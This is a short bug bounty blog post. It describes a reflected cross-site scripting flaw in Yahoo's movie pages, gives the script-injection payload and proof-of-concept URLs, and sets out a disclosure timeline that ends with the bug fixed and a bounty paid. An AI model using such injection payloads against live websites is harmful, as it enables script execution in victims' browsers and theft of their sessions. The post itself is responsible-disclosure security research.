Showing posts with label Reflected XSS in Yahoo. Show all posts
Showing posts with label Reflected XSS in Yahoo. Show all posts

Reflected XSS in yahoo.com

Hello Guys, This is Shahzada Al Shahriar Khan.
I am from Bangladesh. And I am Newbie in Bug Bounty. :P
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main & subdomain of Yahoo.

Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]

Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>

PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>

PoC Screenshot:

Yahoo Canada Subdomain

Video PoC:



Timeline:
Aug 12th - I Submitted The Report.
Aug 15th - Triaged The Report & Rewarded Me a $300 Initial Bounty.
Aug 16th - Bug Resolved
Aug 24th - Another $400 Bounty Rewarded, Total Bounty is $700.